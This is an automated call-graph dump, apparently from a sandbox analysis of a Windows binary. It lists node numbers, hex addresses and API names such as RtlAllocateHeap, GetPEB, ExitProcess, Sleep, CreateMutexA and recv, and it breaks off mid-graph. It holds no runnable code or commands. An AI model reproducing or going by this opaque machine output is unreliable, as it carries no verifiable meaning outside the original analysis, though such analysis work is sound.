10629 9dadf5 ___free_lconv_mon RtlAllocateHeap 10628->10629 10630 9d7a29 10629->10630 10630->10611 10632 9d86a5 10631->10632 10633 9d8692 10631->10633 10632->10622 10634 9d75f6 __dosmaperr RtlAllocateHeap 10633->10634 10635 9d8697 10634->10635 10636 9d6c5a __cftof RtlAllocateHeap 10635->10636 10637 9d86a2 10636->10637 10637->10622 10707 9d7d34 10638->10707 10640 9d7d1a 10641 9d7d31 10640->10641 10642 9d75f6 __dosmaperr RtlAllocateHeap 10640->10642 10641->10622 10643 9d7d23 10642->10643 10644 9d6c5a __cftof RtlAllocateHeap 10643->10644 10645 9d7d2e 10644->10645 10645->10622 10647 9d8178 10646->10647 10648 9d8171 10646->10648 10647->10622 10716 9d7b50 10648->10716 10652 9d7dcb 10651->10652 10653 9d7dd2 10651->10653 10654 9d7b50 4 API calls 10652->10654 10653->10622 10655 9d7dd1 10654->10655 10655->10622 10657 9d7def 10656->10657 10658 9d7e09 10656->10658 10660 9d7f4f 10657->10660 10661 9d7fbb 10657->10661 10662 9d7e39 10657->10662 10659 9d75f6 __dosmaperr RtlAllocateHeap 10658->10659 10658->10662 10663 9d7e25 10659->10663 10672 9d7f92 10660->10672 10674 9d7f5b 10660->10674 10665 9d8001 10661->10665 10666 9d7fc2 10661->10666 10661->10672 10662->10622 10664 9d6c5a __cftof RtlAllocateHeap 10663->10664 10668 9d7e30 10664->10668 10757 9d8604 10665->10757 10669 9d7f69 10666->10669 10670 9d7fc7 10666->10670 10668->10622 10683 9d7f77 10669->10683 10684 9d7f8b 10669->10684 10751 9d8241 10669->10751 10670->10672 10673 9d7fcc 10670->10673 10671 9d7fa2 10671->10684 10728 9d8390 10671->10728 10672->10683 10672->10684 10742 9d8420 10672->10742 10677 9d7fdf 10673->10677 10678 9d7fd1 10673->10678 10674->10669 10674->10671 10674->10683 10736 9d8571 10677->10736 10678->10684 10732 9d85e5 10678->10732 10683->10684 10760 9d86ea 10683->10760 10684->10622 10686 9d7f4f 10685->10686 10687 9d7fbb 10685->10687 10688 9d7f92 10686->10688 10689 9d7f5b 10686->10689 10687->10688 10690 9d8001 10687->10690 10691 9d7fc2 10687->10691 10696 9d8420 RtlAllocateHeap 10688->10696 10705 9d7f77 10688->10705 10706 9d7f8b 10688->10706 10695 9d7fa2 10689->10695 10700 9d7f69 10689->10700 10689->10705 10692 9d8604 RtlAllocateHeap 10690->10692 10693 9d7fc7 10691->10693 10691->10700 10692->10705 10693->10688 10694 9d7fcc 10693->10694 10698 9d7fdf 10694->10698 10699 9d7fd1 10694->10699 10702 9d8390 4 API calls 10695->10702 10695->10706 10696->10705 10697 9d8241 4 API calls 10697->10705 10701 9d8571 RtlAllocateHeap 10698->10701 10703 9d85e5 RtlAllocateHeap 10699->10703 10699->10706 10700->10697 10700->10705 10700->10706 10701->10705 10702->10705 10703->10705 10704 9d86ea 4 API calls 10704->10706 10705->10704 10705->10706 10706->10622 10710 9d7d5e 10707->10710 10709 9d7d40 10709->10640 10712 9d7d80 10710->10712 10711 9d7db7 10711->10709 10712->10711 10713 9d75f6 __dosmaperr RtlAllocateHeap 10712->10713 10714 9d7dac 10713->10714 10715 9d6c5a __cftof RtlAllocateHeap 10714->10715 10715->10711 10717 9d7b67 10716->10717 10718 9d7b62 10716->10718 10724 9d8ab6 10717->10724 10720 9d75f6 __dosmaperr RtlAllocateHeap 10718->10720 10720->10717 10722 9d7b99 10722->10622 10723 9d75f6 __dosmaperr RtlAllocateHeap 10723->10722 10725 9d8ad1 10724->10725 10726 9d8868 GetPEB ExitProcess GetPEB RtlAllocateHeap 10725->10726 10727 9d7b85 10726->10727 10727->10722 10727->10723 10729 9d83ab 10728->10729 10730 9d83dd 10729->10730 10764 9dc88e 10729->10764 10730->10683 10733 9d85f1 10732->10733 10734 9d8420 RtlAllocateHeap 10733->10734 10735 9d8603 10734->10735 10735->10683 10740 9d8586 10736->10740 10737 9d75f6 __dosmaperr RtlAllocateHeap 10738 9d858f 10737->10738 10739 9d6c5a __cftof RtlAllocateHeap 10738->10739 10741 9d859a 10739->10741 10740->10737 10740->10741 10741->10683 10743 9d8433 10742->10743 10744 9d844e 10743->10744 10746 9d8465 10743->10746 10745 9d75f6 __dosmaperr RtlAllocateHeap 10744->10745 10747 9d8453 10745->10747 10750 9d845e 10746->10750 10767 9d779f 10746->10767 10749 9d6c5a __cftof RtlAllocateHeap 10747->10749 10749->10750 10750->10683 10752 9d825a 10751->10752 10753 9d779f RtlAllocateHeap 10752->10753 10754 9d8297 10753->10754 10777 9dd3c8 10754->10777 10756 9d830d 10756->10683 10756->10756 10758 9d8420 RtlAllocateHeap 10757->10758 10759 9d861b 10758->10759 10759->10683 10761 9d875d std::future_error::future_error 10760->10761 10763 9d8707 10760->10763 10761->10684 10762 9dc88e __cftof 4 API calls 10762->10763 10763->10761 10763->10762 10765 9dc733 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10764->10765 10766 9dc8a6 10765->10766 10766->10730 10768 9d77b4 10767->10768 10771 9d77c3 10767->10771 10769 9d75f6 __dosmaperr RtlAllocateHeap 10768->10769 10770 9d77b9 10769->10770 10770->10750 10771->10770 10772 9db04b __cftof RtlAllocateHeap 10771->10772 10773 9d77ea 10772->10773 10774 9d7801 10773->10774 10776 9d7a33 RtlAllocateHeap 10773->10776 10775 9dadf5 ___free_lconv_mon RtlAllocateHeap 10774->10775 10775->10770 10776->10774 10778 9dd3ee 10777->10778 10779 9dd3d8 10777->10779 10778->10779 10783 9dd400 10778->10783 10780 9d75f6 __dosmaperr RtlAllocateHeap 10779->10780 10781 9dd3dd 10780->10781 10782 9d6c5a __cftof RtlAllocateHeap 10781->10782 10796 9dd3e7 10782->10796 10784 9dd467 10783->10784 10786 9dd439 10783->10786 10785 9dd485 10784->10785 10787 9dd48a 10784->10787 10789 9dd4ae 10785->10789 10790 9dd4e4 10785->10790 10794 9dd2ff RtlAllocateHeap 10786->10794 10788 9dcbdf GetPEB ExitProcess GetPEB RtlAllocateHeap 10787->10788 10788->10796 10792 9dd4cc 10789->10792 10793 9dd4b3 10789->10793 10791 9dcef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10790->10791 10791->10796 10797 9dd0e2 GetPEB ExitProcess GetPEB RtlAllocateHeap 10792->10797 10795 9dd23e GetPEB ExitProcess GetPEB RtlAllocateHeap 10793->10795 10794->10796 10795->10796 10796->10756 10797->10796 10799 9b9294 10798->10799 10802 9b92a5 __cftof 10799->10802 10803 9b94e0 10799->10803 10801 9b932b 10801->10435 10802->10435 10804 9b950b 10803->10804 10805 9b9619 10803->10805 10809 9b9579 10804->10809 10810 9b9552 10804->10810 10806 9b9270 RtlAllocateHeap 10805->10806 10807 9b961e 10806->10807 10808 9a2480 RtlAllocateHeap 10807->10808 10817 9b9563 __cftof 10808->10817 10814 9bd3e2 RtlAllocateHeap 10809->10814 10809->10817 10810->10807 10811 9b955d 10810->10811 10813 9bd3e2 RtlAllocateHeap 10811->10813 10812 9d6c6a RtlAllocateHeap 10815 9b9628 shared_ptr 10812->10815 10813->10817 10814->10817 10815->10801 10816 9b95e1 shared_ptr __cftof 10816->10801 10817->10812 10817->10816 10818 9a42b0 10821 9a3ac0 10818->10821 10820 9a42bb shared_ptr 10822 9a3af9 10821->10822 10823 9d6c6a RtlAllocateHeap 10822->10823 10829 9a3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10822->10829 10824 9a3be6 10823->10824 10827 9a3c38 10824->10827 10842 9a32d0 10824->10842 10825 9a32d0 6 API calls 10830 9a3c5f 10825->10830 10827->10825 10827->10830 10828 9a3c68 10828->10820 10829->10820 10830->10828 10831 9a3810 4 API calls 10830->10831 10832 9a3cdb 10831->10832 10833 9b7d50 RtlAllocateHeap 10832->10833 10834 9a3d52 10832->10834 10833->10834 10835 9bd3e2 RtlAllocateHeap 10834->10835 10836 9a3d84 10835->10836 10837 9b7d50 RtlAllocateHeap 10836->10837 10839 9a3e03 10836->10839 10837->10839 10838 9a3e9b shared_ptr 10838->10820 10839->10838 10840 9d6c6a RtlAllocateHeap 10839->10840 10841 9a3ec1 10840->10841 10859 9bc6ac 10842->10859 10845 9a333c __Mtx_unlock 10847 9bc26a 5 API calls 10845->10847 10848 9a3350 std::future_error::future_error 10845->10848 10846 9a3314 10846->10845 10862 9bc26a 10846->10862 10849 9a3377 10847->10849 10848->10827 10850 9bc6ac GetSystemTimePreciseAsFileTime 10849->10850 10851 9a33af 10850->10851 10852 9bc26a 5 API calls 10851->10852 10853 9a33b6 10851->10853 10852->10853 10854 9bc26a 5 API calls 10853->10854 10855 9a33d7 __Mtx_unlock 10853->10855 10854->10855 10856 9bc26a 5 API calls 10855->10856 10857 9a33eb 10855->10857 10858 9a340e 10856->10858 10857->10827 10858->10827 10866 9bc452 10859->10866 10861 9bc6b9 10861->10846 10863 9bc292 10862->10863 10864 9bc274 10862->10864 10863->10863 10864->10863 10883 9bc297 10864->10883 10867 9bc4a8 10866->10867 10868 9bc47a std::future_error::future_error 10866->10868 10867->10868 10872 9bcf6b 10867->10872 10868->10861 10870 9bc4fd __Xtime_diff_to_millis2 10870->10868 10871 9bcf6b _xtime_get GetSystemTimePreciseAsFileTime 10870->10871 10871->10870 10873 9bcf7a 10872->10873 10874 9bcf87 __aulldvrm 10872->10874 10873->10874 10876 9bcf44 10873->10876 10874->10870 10879 9bcbea 10876->10879 10880 9bcbfb GetSystemTimePreciseAsFileTime 10879->10880 10881 9bcc07 10879->10881 10880->10881 10881->10874 10888 9a2ae0 10883->10888 10885 9bc2ae 10895 9bc1ff 10885->10895 10887 9bc2bf Concurrency::cancel_current_task 10889 9bbedf InitOnceExecuteOnce 10888->10889 10890 9a2af4 __dosmaperr 10889->10890 10890->10885 10891 9da671 __cftof 4 API calls 10890->10891 10894 9d6ccc 10891->10894 10892 9d8bec __cftof 4 API calls 10893 9d6cf6 10892->10893 10894->10892 10896 9bc20b __EH_prolog3_GS 10895->10896 10897 9b80c0 RtlAllocateHeap 10896->10897 10898 9bc23d 10897->10898 10903 9a26b0 10898->10903 10900 9bc252 10920 9b7970 10900->10920 10902 9bc25a 10902->10887 10904 9b7a00 RtlAllocateHeap 10903->10904 10905 9a2702 10904->10905 10906 9a2725 10905->10906 10907 9b8f40 RtlAllocateHeap 10905->10907 10908 9b8f40 RtlAllocateHeap 10906->10908 10909 9a278e 10906->10909 10907->10906 10908->10909 10910 9a27ed shared_ptr 10909->10910 10912 9a28b8 10909->10912 10911 9d38af ___std_exception_copy RtlAllocateHeap 10910->10911 10915 9a284b 10911->10915 10914 9d6c6a RtlAllocateHeap 10912->10914 10913 9a287a shared_ptr std::future_error::future_error 10913->10900 10914->10915 10915->10913 10916 9d6c6a RtlAllocateHeap 10915->10916 10917 9a28c2 10916->10917 10925 9d3912 10917->10925 10919 9a28e5 shared_ptr 10919->10900 10921 9b7996 shared_ptr 10920->10921 10922 9b797b 10920->10922 10921->10902 10922->10921 10923 9d6c6a RtlAllocateHeap 10922->10923 10924 9b79ba 10923->10924 10926 9d391f 10925->10926 10927 9d3926 10925->10927 10928 9d8ba3 ___std_exception_destroy RtlAllocateHeap 10926->10928 10927->10919 10928->10927 10929 9a5cad 10931 9a5caf shared_ptr 10929->10931 10930 9a5d17 shared_ptr std::future_error::future_error 10931->10930 10932 9d6c6a RtlAllocateHeap 10931->10932 10933 9a5d47 __cftof 10932->10933 10933->10933 10934 9b80c0 RtlAllocateHeap 10933->10934 10936 9a5e3e 10934->10936 10935 9a5ea6 shared_ptr std::future_error::future_error 10936->10935 10937 9d6c6a RtlAllocateHeap 10936->10937 10938 9a5ed2 10937->10938 10939 9a5ffe shared_ptr std::future_error::future_error 10938->10939 10940 9d6c6a RtlAllocateHeap 10938->10940 10941 9a601b 10940->10941 10942 9b80c0 RtlAllocateHeap 10941->10942 10943 9a6089 10942->10943 10944 9b80c0 RtlAllocateHeap 10943->10944 10945 9a60bd 10944->10945 10946 9b80c0 RtlAllocateHeap 10945->10946 10947 9a60ee 10946->10947 10948 9b80c0 RtlAllocateHeap 10947->10948 10949 9a611f 10948->10949 10950 9b80c0 RtlAllocateHeap 10949->10950 10952 9a6150 10950->10952 10951 9a65b1 shared_ptr std::future_error::future_error 10952->10951 10953 9d6c6a RtlAllocateHeap 10952->10953 10954 9a65dc 10953->10954 10955 9b7a00 RtlAllocateHeap 10954->10955 10956 9a66a6 10955->10956 10957 9a5c10 4 API calls 10956->10957 10958 9a66ac 10957->10958 10959 9a5c10 4 API calls 10958->10959 10960 9a66b1 10959->10960 10961 9a22c0 4 API calls 10960->10961 10962 9a66c9 shared_ptr 10961->10962 10963 9b7a00 RtlAllocateHeap 10962->10963 10964 9a6732 10963->10964 10965 9a5c10 4 API calls 10964->10965 10966 9a673d 10965->10966 10967 9a22c0 4 API calls 10966->10967 10976 9a6757 shared_ptr 10967->10976 10968 9a6852 10969 9b80c0 RtlAllocateHeap 10968->10969 10971 9a689c 10969->10971 10970 9b7a00 RtlAllocateHeap 10970->10976 10972 9b80c0 RtlAllocateHeap 10971->10972 10975 9a68e3 shared_ptr std::future_error::future_error 10972->10975 10973 9a5c10 4 API calls 10973->10976 10974 9a22c0 4 API calls 10974->10976 10976->10968 10976->10970 10976->10973 10976->10974 10992 9a20a0 10997 9bc68b 10992->10997 10995 9bd64e RtlAllocateHeap 10996 9a20b6 10995->10996 11000 9bc3d5 10997->11000 10999 9a20ac 10999->10995 11001 9bc3eb 11000->11001 11002 9bc3e1 11000->11002 11001->10999 11003 9bc3be 11002->11003 11004 9bc39e 11002->11004 11013 9bcd0a 11003->11013 11004->11001 11009 9bccd5 11004->11009 11007 9bc3d0 11007->10999 11010 9bc3b7 11009->11010 11011 9bcce3 InitializeCriticalSectionEx 11009->11011 11010->10999 11011->11010 11014 9bcd1f RtlInitializeConditionVariable 11013->11014 11014->11007 11015 9a34a0 11016 9a34aa 11015->11016 11017 9a34ca shared_ptr 11015->11017 11016->11017 11018 9d6c6a RtlAllocateHeap 11016->11018 11019 9a34f2 11018->11019 11021 9a3537 shared_ptr 11019->11021 11023 9bc17c 11019->11023 11024 9bc18a Concurrency::cancel_current_task 11023->11024 11027 9bc0e9 11024->11027 11026 9bc1aa Concurrency::cancel_current_task 11028 9a22e0 std::future_error::future_error RtlAllocateHeap 11027->11028 11029 9bc0fb 11028->11029 11029->11026 11055 9a9adc 11059 9a9aea shared_ptr 11055->11059 11056 9aa917 11057 9aa953 Sleep CreateMutexA 11056->11057 11058 9d6c6a RtlAllocateHeap 11056->11058 11060 9aa98e 11057->11060 11058->11057 11059->11056 11061 9a9b4b shared_ptr 11059->11061 11062 9a9b59 11061->11062 11063 9a9b65 11061->11063 11066 9b80c0 RtlAllocateHeap 11062->11066 11064 9b7a00 RtlAllocateHeap 11063->11064 11065 9a9b74 11064->11065 11067 9a5c10 4 API calls 11065->11067 11068 9aa903 11066->11068 11069 9a9b7c 11067->11069 11070 9a8b30 4 API calls 11069->11070 11071 9a9b8d 11070->11071 11072 9b8220 RtlAllocateHeap 11071->11072 11073 9a9b9c 11072->11073 11074 9b7a00 RtlAllocateHeap 11073->11074 11075 9a9ca9 11074->11075 11076 9a5c10 4 API calls 11075->11076 11077 9a9cb1 11076->11077 11078 9a8b30 4 API calls 11077->11078 11079 9a9cc2 11078->11079 11080 9b8220 RtlAllocateHeap 11079->11080 11081 9a9cd1 11080->11081 11122 9a20c0 11123 9bc68b __Mtx_init_in_situ 2 API calls 11122->11123 11124 9a20cc 11123->11124 11125 9bd64e RtlAllocateHeap 11124->11125 11126 9a20d6 11125->11126 11127 9ae0c0 recv 11128 9ae122 recv 11127->11128 11129 9ae157 recv 11128->11129 11130 9ae191 11129->11130 11131 9ae2b3 std::future_error::future_error 11130->11131 11132 9bc6ac GetSystemTimePreciseAsFileTime 11130->11132 11133 9ae2ee 11132->11133 11134 9bc26a 5 API calls 11133->11134 11135 9ae358 11134->11135 11136 9a2ec0 11137 9a2f06 11136->11137 11141 9a2f6f 11136->11141 11138 9bc6ac GetSystemTimePreciseAsFileTime 11137->11138 11139 9a2f12 11138->11139 11142 9a301e 11139->11142 11143 9a2f1d 11139->11143 11140 9a2fef 11141->11140 11149 9bc6ac GetSystemTimePreciseAsFileTime 11141->11149 11144 9bc26a 5 API calls 11142->11144 11146 9bd3e2 RtlAllocateHeap 11143->11146 11148 9a2f30 __Mtx_unlock 11143->11148 11145 9a3024 11144->11145 11147 9bc26a 5 API calls 11145->11147 11146->11148 11150 9a2fb9 11147->11150 11148->11141 11148->11145 11149->11150 11151 9bc26a 5 API calls 11150->11151 11152 9a2fc0 __Mtx_unlock 11150->11152 11151->11152 11153 9bc26a 5 API calls 11152->11153 11154 9a2fd8 11152->11154 11153->11154 11154->11140 11155 9bc26a 5 API calls 11154->11155 11156 9a303c 11155->11156 11157 9bc6ac GetSystemTimePreciseAsFileTime 11156->11157 11166 9a3080 shared_ptr __Mtx_unlock 11157->11166 11158 9bc26a 5 API calls 11159 9a31cb 11158->11159 11160 9bc26a 5 API calls 11159->11160 11161 9a31d1 11160->11161 11162 9bc26a 5 API calls 11161->11162 11168 9a3193 __Mtx_unlock 11162->11168 11163 9a31a7 std::future_error::future_error 11164 9bc26a 5 API calls 11165 9a31dd 11164->11165 11166->11159 11166->11163 11167 9bc6ac GetSystemTimePreciseAsFileTime 11166->11167 11169 9a315f 11166->11169 11167->11169 11168->11163 11168->11164 11169->11158 11169->11161 11169->11168 11170 9bd0c7 11171 9bd0d6 11170->11171 11172 9bd17b RtlWakeAllConditionVariable 11171->11172 11173 9bd17f 11171->11173 11178 9e44f2 11179 9e44ff 11178->11179 11180 9e450c 11178->11180 11181 9d75f6 __dosmaperr RtlAllocateHeap 11179->11181 11182 9e4518 11180->11182 11183 9d75f6 __dosmaperr RtlAllocateHeap 11180->11183 11184 9e4504 11181->11184 11185 9e4539 11183->11185 11186 9d6c5a __cftof RtlAllocateHeap 11185->11186 11186->11184 11187 9a6ae9 11188 9a6b01 11187->11188 11189 9b80c0 RtlAllocateHeap 11188->11189 11192 9a6bbd shared_ptr 11188->11192 11190 9a6bac 11189->11190 11191 9b9280 RtlAllocateHeap 11190->11191 11191->11192 11193 9b80c0 RtlAllocateHeap 11192->11193 11194 9a6ce3 shared_ptr std::future_error::future_error 11193->11194 11243 9aa418 11245 9aa420 shared_ptr 11243->11245 11244 9aa93f 11246 9d6c6a RtlAllocateHeap 11244->11246 11245->11244 11247 9aa4f3 shared_ptr 11245->11247 11248 9aa944 11246->11248 11250 9b80c0 RtlAllocateHeap 11247->11250 11249 9d6c6a RtlAllocateHeap 11248->11249 11251 9aa949 11249->11251 11252 9aa903 11250->11252 11253 9d6c6a RtlAllocateHeap 11251->11253 11254 9aa94e 11253->11254 11255 9d6c6a RtlAllocateHeap 11254->11255 11256 9aa953 Sleep CreateMutexA 11255->11256 11257 9aa98e 11256->11257 11269 9a1000 11270 9bd64e RtlAllocateHeap 11269->11270 11271 9a100a 11270->11271 11307 9a2e00 11308 9a2e28 11307->11308 11309 9bc68b __Mtx_init_in_situ 2 API calls 11308->11309 11310 9a2e33 11309->11310 9691 9dd82f 9692 9dd83c __dosmaperr 9691->9692 9693 9dd867 RtlAllocateHeap 9692->9693 9694 9dd87a __dosmaperr 9692->9694 9693->9692 9693->9694 9695 9d6629 9698 9d64c7 9695->9698 9699 9d64d5 __cftof 9698->9699 9700 9d6520 9699->9700 9703 9d652b 9699->9703 9702 9d652a 9709 9da302 GetPEB 9703->9709 9705 9d6535 9706 9d653a GetPEB 9705->9706 9707 9d654a __cftof 9705->9707 9706->9707 9708 9d6562 ExitProcess 9707->9708 9710 9da31c __cftof 9709->9710 9710->9705 11334 9a1020 11335 9b80c0 RtlAllocateHeap 11334->11335 11336 9a1031 11335->11336 11337 9bd64e RtlAllocateHeap 11336->11337 11338 9a103b 11337->11338 11362 9bbe50 11365 9bbd8b 11362->11365 11364 9bbe66 Concurrency::cancel_current_task std::_Throw_future_error 11366 9a22e0 std::future_error::future_error RtlAllocateHeap 11365->11366 11367 9bbd9f 11366->11367 11367->11364 9711 9aa856 9712 9aa870 9711->9712 9713 9aa892 shared_ptr 9711->9713 9712->9713 9714 9aa94e 9712->9714 9723 9b80c0 9713->9723 9720 9d6c6a 9714->9720 9717 9aa953 Sleep CreateMutexA 9719 9aa98e 9717->9719 9718 9aa903 9738 9d6bf6 9720->9738 9722 9d6c79 __cftof 9726 9b8104 9723->9726 9727 9b80de 9723->9727 9724 9b81ee 9897 9b9270 9724->9897 9726->9724 9729 9b8158 9726->9729 9730 9b817d 9726->9730 9727->9718 9728 9b81f3 9900 9a2480 9728->9900 9729->9728 9892 9bd3e2 9729->9892 9734 9bd3e2 RtlAllocateHeap 9730->9734 9735 9b8169 __cftof 9730->9735 9734->9735 9736 9d6c6a RtlAllocateHeap 9735->9736 9737 9b81d0 shared_ptr 9735->9737 9736->9724 9737->9718 9744 9da7c8 9738->9744 9740 9d6c0f 9740->9722 9741 9d6c01 __cftof 9741->9740 9742 9d6bf6 __cftof RtlAllocateHeap 9741->9742 9743 9d6c66 9742->9743 9743->9722 9745 9da7d2 __dosmaperr 9744->9745 9753 9da7eb 9745->9753 9755 9dd82f 9745->9755 9747 9da813 __dosmaperr 9748 9da853 9747->9748 9749 9da81b __dosmaperr 9747->9749 9763 9da49f 9748->9763 9759 9dadf5 9749->9759 9753->9741 9754 9dadf5 ___free_lconv_mon RtlAllocateHeap 9754->9753 9756 9dd83c __dosmaperr 9755->9756 9757 9dd867 RtlAllocateHeap 9756->9757 9758 9dd87a __dosmaperr 9756->9758 9757->9756 9757->9758 9758->9747 9760 9dae00 9759->9760 9762 9dae1b __dosmaperr 9759->9762 9760->9762 9767 9d75f6 9760->9767 9762->9753 9764 9da50d __dosmaperr 9763->9764 9770 9da445 9764->9770 9766 9da536 9766->9754 9768 9da7c8 __dosmaperr RtlAllocateHeap 9767->9768 9769 9d75fb 9768->9769 9769->9762 9771 9da451 __dosmaperr 9770->9771 9774 9da626 9771->9774 9773 9da473 __dosmaperr 9773->9766 9775 9da65c __dosmaperr 9774->9775 9776 9da635 __dosmaperr 9774->9776 9775->9773 9776->9775 9778 9df35f 9776->9778 9779 9df375 9778->9779 9780 9df3df 9778->9780 9779->9780 9786 9df3a8 9779->9786 9787 9dadf5 ___free_lconv_mon RtlAllocateHeap 9779->9787 9782 9dadf5 ___free_lconv_mon RtlAllocateHeap 9780->9782 9805 9df42d 9780->9805 9783 9df401 9782->9783 9784 9dadf5 ___free_lconv_mon RtlAllocateHeap 9783->9784 9788 9df414 9784->9788 9785 9df3ca 9789 9dadf5 ___free_lconv_mon RtlAllocateHeap 9785->9789 9786->9785 9793 9dadf5 ___free_lconv_mon RtlAllocateHeap 9786->9793 9791 9df39d 9787->9791 9792 9dadf5 ___free_lconv_mon RtlAllocateHeap 9788->9792 9794 9df3d4 9789->9794 9790 9df49b 9795 9dadf5 ___free_lconv_mon RtlAllocateHeap 9790->9795 9806 9def3c 9791->9806 9797 9df422 9792->9797 9798 9df3bf 9793->9798 9799 9dadf5 ___free_lconv_mon RtlAllocateHeap 9794->9799 9800 9df4a1 9795->9800 9802 9dadf5 ___free_lconv_mon RtlAllocateHeap 9797->9802 9834 9df03a 9798->9834 9799->9780 9800->9775 9801 9df43b 9801->9790 9804 9dadf5 RtlAllocateHeap ___free_lconv_mon 9801->9804 9802->9805 9804->9801 9846 9df4d0 9805->9846 9807 9def4d 9806->9807 9833 9df036 9806->9833 9808 9def5e 9807->9808 9810 9dadf5 ___free_lconv_mon RtlAllocateHeap 9807->9810 9809 9def70 9808->9809 9811 9dadf5 ___free_lconv_mon RtlAllocateHeap 9808->9811 9812 9def82 9809->9812 9813 9dadf5 ___free_lconv_mon RtlAllocateHeap 9809->9813 9810->9808 9811->9809 9814 9def94 9812->9814 9815 9dadf5 ___free_lconv_mon RtlAllocateHeap 9812->9815 9813->9812 9816 9defa6 9814->9816 9818 9dadf5 ___free_lconv_mon RtlAllocateHeap 9814->9818 9815->9814 9817 9defb8 9816->9817 9819 9dadf5 ___free_lconv_mon RtlAllocateHeap 9816->9819 9820 9defca 9817->9820 9821 9dadf5 ___free_lconv_mon RtlAllocateHeap 9817->9821 9818->9816 9819->9817 9822 9defdc 9820->9822 9823 9dadf5 ___free_lconv_mon RtlAllocateHeap 9820->9823 9821->9820 9824 9defee 9822->9824 9825 9dadf5 ___free_lconv_mon RtlAllocateHeap 9822->9825 9823->9822 9826 9dadf5 ___free_lconv_mon RtlAllocateHeap 9824->9826 9827 9df000 9824->9827 9825->9824 9826->9827 9828 9dadf5 ___free_lconv_mon RtlAllocateHeap 9827->9828 9829 9df012 9827->9829 9828->9829 9830 9df024 9829->9830 9831 9dadf5 ___free_lconv_mon RtlAllocateHeap 9829->9831 9832 9dadf5 ___free_lconv_mon RtlAllocateHeap 9830->9832 9830->9833 9831->9830 9832->9833 9833->9786 9835 9df047 9834->9835 9836 9df09f 9834->9836 9837 9df057 9835->9837 9838 9dadf5 ___free_lconv_mon RtlAllocateHeap 9835->9838 9836->9785 9839 9df069 9837->9839 9840 9dadf5 ___free_lconv_mon RtlAllocateHeap 9837->9840 9838->9837 9841 9df07b 9839->9841 9842 9dadf5 ___free_lconv_mon RtlAllocateHeap 9839->9842 9840->9839 9843 9df08d 9841->9843 9844 9dadf5 ___free_lconv_mon RtlAllocateHeap 9841->9844 9842->9841 9843->9836 9845 9dadf5 ___free_lconv_mon RtlAllocateHeap 9843->9845 9844->9843 9845->9836 9847 9df4dd 9846->9847 9851 9df4fc 9846->9851 9847->9851 9852 9df0db 9847->9852 9850 9dadf5 ___free_lconv_mon RtlAllocateHeap 9850->9851 9851->9801 9853 9df1b9 9852->9853 9854 9df0ec 9852->9854 9853->9850 9888 9df0a3 9854->9888 9857 9df0a3 __dosmaperr RtlAllocateHeap 9858 9df0ff 9857->9858 9859 9df0a3 __dosmaperr RtlAllocateHeap 9858->9859 9860 9df10a 9859->9860 9861 9df0a3 __dosmaperr RtlAllocateHeap 9860->9861 9862 9df115 9861->9862 9863 9df0a3 __dosmaperr RtlAllocateHeap 9862->9863 9864 9df123 9863->9864 9865 9dadf5 ___free_lconv_mon RtlAllocateHeap 9864->9865 9866 9df12e 9865->9866 9867 9dadf5 ___free_lconv_mon RtlAllocateHeap 9866->9867 9868 9df139 9867->9868 9869 9dadf5 ___free_lconv_mon RtlAllocateHeap 9868->9869 9870 9df144 9869->9870 9871 9df0a3 __dosmaperr RtlAllocateHeap 9870->9871 9872 9df152 9871->9872 9873 9df0a3 __dosmaperr RtlAllocateHeap 9872->9873 9874 9df160 9873->9874 9875 9df0a3 __dosmaperr RtlAllocateHeap 9874->9875 9876 9df171 9875->9876 9877 9df0a3 __dosmaperr RtlAllocateHeap 9876->9877 9878 9df17f 9877->9878 9879 9df0a3 __dosmaperr RtlAllocateHeap 9878->9879 9880 9df18d 9879->9880 9881 9dadf5 ___free_lconv_mon RtlAllocateHeap 9880->9881 9882 9df198 9881->9882 9883 9dadf5 ___free_lconv_mon RtlAllocateHeap 9882->9883 9884 9df1a3 9883->9884 9885 9dadf5 ___free_lconv_mon RtlAllocateHeap 9884->9885 9886 9df1ae 9885->9886 9887 9dadf5 ___free_lconv_mon RtlAllocateHeap 9886->9887 9887->9853 9889 9df0d6 9888->9889 9890 9df0c6 9888->9890 9889->9857 9890->9889 9891 9dadf5 ___free_lconv_mon RtlAllocateHeap 9890->9891 9891->9890 9893 9a2480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9892->9893 9896 9bd401 Concurrency::cancel_current_task 9893->9896 9904 9d38af 9893->9904 9896->9735 9925 9bc1b9 9897->9925 9901 9a248e Concurrency::cancel_current_task 9900->9901 9902 9d38af ___std_exception_copy RtlAllocateHeap 9901->9902 9903 9a24c3 9902->9903 9905 9d38bc ___std_exception_copy 9904->9905 9909 9a24c3 9904->9909 9908 9d38e9 9905->9908 9905->9909 9910 9da1f1 9905->9910 9919 9d8ba3 9908->9919 9909->9735 9911 9da20c 9910->9911 9912 9da1fe 9910->9912 9913 9d75f6 __dosmaperr RtlAllocateHeap 9911->9913 9912->9911 9914 9da223 9912->9914 9918 9da214 9913->9918 9916 9da21e 9914->9916 9917 9d75f6 __dosmaperr RtlAllocateHeap 9914->9917 9916->9908 9917->9918 9922 9d6c5a 9918->9922 9920 9dadf5 ___free_lconv_mon RtlAllocateHeap 9919->9920 9921 9d8bbb 9920->9921 9921->9909 9923 9d6bf6 __cftof RtlAllocateHeap 9922->9923 9924 9d6c66 9923->9924 9924->9916 9928 9bc123 9925->9928 9927 9bc1ca Concurrency::cancel_current_task 9931 9a22e0 9928->9931 9930 9bc135 9930->9927 9932 9d38af ___std_exception_copy RtlAllocateHeap 9931->9932 9933 9a2317 std::future_error::future_error 9932->9933 9933->9930 11368 9d6a44 11369 9d6a5c 11368->11369 11370 9d6a52 11368->11370 11386 9d698d 11369->11386 11381 9db655 11370->11381 11373 9d6a59 11374 9d6a76 11389 9d68ed 11374->11389 11377 9d6a8a 11379 9d6aa8 11377->11379 11380 9dadf5 ___free_lconv_mon RtlAllocateHeap 11377->11380 11378 9db655 RtlAllocateHeap 11378->11377 11380->11379 11382 9db662 11381->11382 11383 9db679 11382->11383 11392 9d75c0 11382->11392 11383->11373 11387 9d690a __cftof 4 API calls 11386->11387 11388 9d699f 11387->11388 11388->11374 11400 9d683b 11389->11400 11397 9d75e3 11392->11397 11394 9d75cb __dosmaperr 11395 9d75f6 __dosmaperr RtlAllocateHeap 11394->11395 11396 9d75de 11395->11396 11396->11373 11398 9da7c8 __dosmaperr RtlAllocateHeap 11397->11398 11399 9d75e8 11398->11399 11399->11394 11401 9d6849 11400->11401 11402 